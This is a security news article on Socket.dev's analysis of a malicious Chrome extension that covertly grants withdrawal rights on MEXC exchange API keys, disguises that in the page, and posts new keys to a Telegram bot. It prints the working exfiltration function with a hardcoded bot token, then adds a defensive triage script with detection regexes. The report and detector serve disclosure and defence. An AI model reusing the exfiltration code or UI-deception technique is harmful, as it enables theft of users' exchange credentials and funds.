Malicious Chrome Extension Steals Wallet Login Credentials and Enables Automated Trading

Jennifer Sherman
January 13, 2026

The malicious Chrome extension, MEXC API Automator, is exploiting user trust in browser add-ons to steal cryptocurrency trading access from MEXC users.

Posed as a tool that helps automate trading and API key creation, it quietly takes control of newly created API keys and turns a normal browser session into a full account takeover channel.

The attack starts from a legitimate-looking Chrome Web Store listing that promises “easy API key creation with trading and withdrawal access” for the MEXC exchange.

Once installed, the extension activates when the victim opens MEXC’s API management page, where users normally create keys for bots and automated trading.

From there, it can silently create powerful keys, trigger trades, and enable withdrawals across a global user base.

MEXC interface (Source: Socket.dev)

The MEXC interface shown above is what targeted users see during this process; nothing about it looks out of the ordinary.

After reviewing the extension, Socket.dev researchers identified it as outright malware and linked it to a threat actor using the handle jorjortan142.

Their analysis showed that the code runs only inside the already logged-in MEXC session, which means traditional password theft is not even needed.

The API automator highlights how the Chrome Web Store branding is used to build trust.

Instead of stealing passwords, the extension focuses on MEXC API keys that allow both trading and withdrawals. These keys often live for a long time, are reused in bots and scripts, and are not watched as closely as interactive logins.

As soon as a fresh key appears in the success popup, the extension grabs it and prepares it for exfiltration to attacker-controlled Telegram infrastructure.

AI scanner detection (Source: Socket.dev)

This report now looks at how the extension infects the browser session, hides dangerous settings, and sends stolen data out in the background. The scanner detection shows Socket AI Scanner flagging this behavior inside the extension code.

Infection Mechanism, UI Deception, and Telegram Exfiltration

MEXC API Automator is a Manifest V3 Chrome extension that injects a single content script, script.js, into pages matching the URL pattern *://*.mexc.com/user/openapi* (the wildcards in the match pattern are lost in some renderings of the listing).

When the victim opens this page, the script waits for the DOM to load, finds the API creation form, and programmatically selects all permission checkboxes, including withdrawals, without any extra clicks from the user.

To fool the victim, the script then tampers with the page styles so the withdrawal option looks disabled even though it stays enabled on the server side.

It strips the “checked” class from the withdraw checkbox, hides the visual tick mark with injected CSS, and uses a MutationObserver to remove the class again if MEXC’s own code restores it.

The victim thinks only trading is allowed, but the submitted form actually carries full withdrawal rights.

When the exchange shows the success modal with the new Access Key and Secret Key, the script scrapes both values straight from the DOM and sends them to a hardcoded Telegram bot and chat ID in the background.

The core of this behavior appears in a simple function:

// Exfiltration routine as reported by Socket.dev: the bot token and chat ID
// are hardcoded, so every stolen key pair lands in the same attacker-controlled chat.
function sendKeysToTelegram(apiKey, secretKey) {
  const botToken = '7534112291:AAF46jJWWo95XsRWkzcPevHW7XNo6cqKG9I';
  const chatId  = '6526634583';
  // Plain HTTPS POST to the Telegram Bot API; the newline between the two
  // values appears as "n" in the original report because the backslash was stripped.
  fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ chat_id: chatId, text: `API Key: ${apiKey}\nSecret Key: ${secretKey}` })
  });
}

Since the extension stays inside the browser sandbox, reads only page content, and sends data over normal HTTPS, it blends into regular web traffic.

By the time a victim notices strange trades or missing funds, the attacker has already loaded the keys into scripts or tools that can drain accounts without ever touching the user’s password.
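The behaviours described above (a content script scoped to the exchange's API-key page, checkboxes ticked programmatically, the "checked" class stripped and re-stripped by a MutationObserver, and a hardcoded Telegram bot endpoint) are all visible statically in an unpacked extension. The following is an added example of a small static triage script a defender could run over an extension's manifest.json and content script before allowing it on managed browsers; it is not Socket.dev's scanner and not code from the extension. The manifest and script it inspects are constructed samples that mirror the report's description, and the Telegram token in the sample is an obviously fake placeholder.

```javascript
// Added example: static triage of an unpacked Chrome extension for the
// indicators described in the report. Heuristics only; a hit means
// "look closer", not proof of malice on its own.

// Telegram Bot API URLs embed the bot token directly: <digits>:<35-ish chars>.
const TELEGRAM_BOT_RE = /api\.telegram\.org\/bot(\d{8,12}):([A-Za-z0-9_-]{30,40})/g;
// Content scripts scoped to an exchange's API-key management page.
const EXCHANGE_API_PAGE_RE = /mexc\.com\/user\/openapi/i;

// Source-level patterns matching the UI deception the report describes.
const SOURCE_CHECKS = [
  ['auto-checks-permissions', /\.checked\s*=\s*true/],
  ['hides-withdraw-checked-state', /classList\.remove\(\s*['"]checked['"]\s*\)/],
  ['mutation-observer-reasserts-ui', /new\s+MutationObserver\s*\(/],
  ['references-secret-key', /secret\s*key/i],
];

function triageExtension(manifest, contentScriptSource) {
  const findings = [];

  // 1. Which pages does the content script run on?
  for (const cs of manifest.content_scripts || []) {
    for (const pattern of cs.matches || []) {
      if (EXCHANGE_API_PAGE_RE.test(pattern)) {
        findings.push({ id: 'targets-api-key-page', detail: pattern });
      }
    }
  }

  // 2. Hardcoded Telegram bot endpoint (exfiltration channel). The token is
  //    redacted in the finding so the triage log itself is not a secret.
  for (const hit of contentScriptSource.matchAll(TELEGRAM_BOT_RE)) {
    findings.push({ id: 'telegram-bot-exfil', detail: `bot ${hit[1]}:${hit[2].slice(0, 4)}...` });
  }

  // 3. DOM-tampering indicators in the script body.
  for (const [id, re] of SOURCE_CHECKS) {
    if (re.test(contentScriptSource)) findings.push({ id, detail: re.source });
  }

  const distinct = new Set(findings.map(f => f.id)).size;
  const verdict = distinct >= 3 ? 'malicious' : distinct >= 1 ? 'suspicious' : 'clean';
  return { verdict, findings };
}

// Constructed sample manifest (not the real extension's manifest).
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: 'constructed sample, not the real extension',
  content_scripts: [{ matches: ['*://*.mexc.com/user/openapi*'], js: ['script.js'] }],
};

// Constructed sample content script mirroring the reported behaviour.
// The bot token below is a placeholder, not a real credential.
const SAMPLE_CONTENT_SCRIPT = `
document.addEventListener('DOMContentLoaded', () => {
  document.querySelectorAll('input[type=checkbox]').forEach(cb => { cb.checked = true; });
  const withdraw = document.querySelector('#withdraw');
  withdraw.classList.remove('checked');
  new MutationObserver(() => withdraw.classList.remove('checked'))
    .observe(withdraw, { attributes: true });
});
function sendKeysToTelegram(apiKey, secretKey) {
  fetch('https://api.telegram.org/bot0000000000:PLACEHOLDER_TOKEN_NOT_REAL_0000000000/sendMessage',
        { method: 'POST' });
}
`;

// Constructed benign control: a script with none of the indicators.
const BENIGN_MANIFEST = { manifest_version: 3, content_scripts: [{ matches: ['*://*.example.com/*'], js: ['a.js'] }] };
const BENIGN_SCRIPT = "console.log('hello');";

function runSample() {
  return {
    sample: triageExtension(SAMPLE_MANIFEST, SAMPLE_CONTENT_SCRIPT),
    benign: triageExtension(BENIGN_MANIFEST, BENIGN_SCRIPT),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(runSample(), null, 2));
}
```

The same Telegram-token regex is worth carrying into network monitoring: an extension process making a POST to api.telegram.org/bot<token>/sendMessage is exactly the traffic the report says blends into normal HTTPS, and at the proxy or DNS layer it is one of the few observable signals before funds move.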
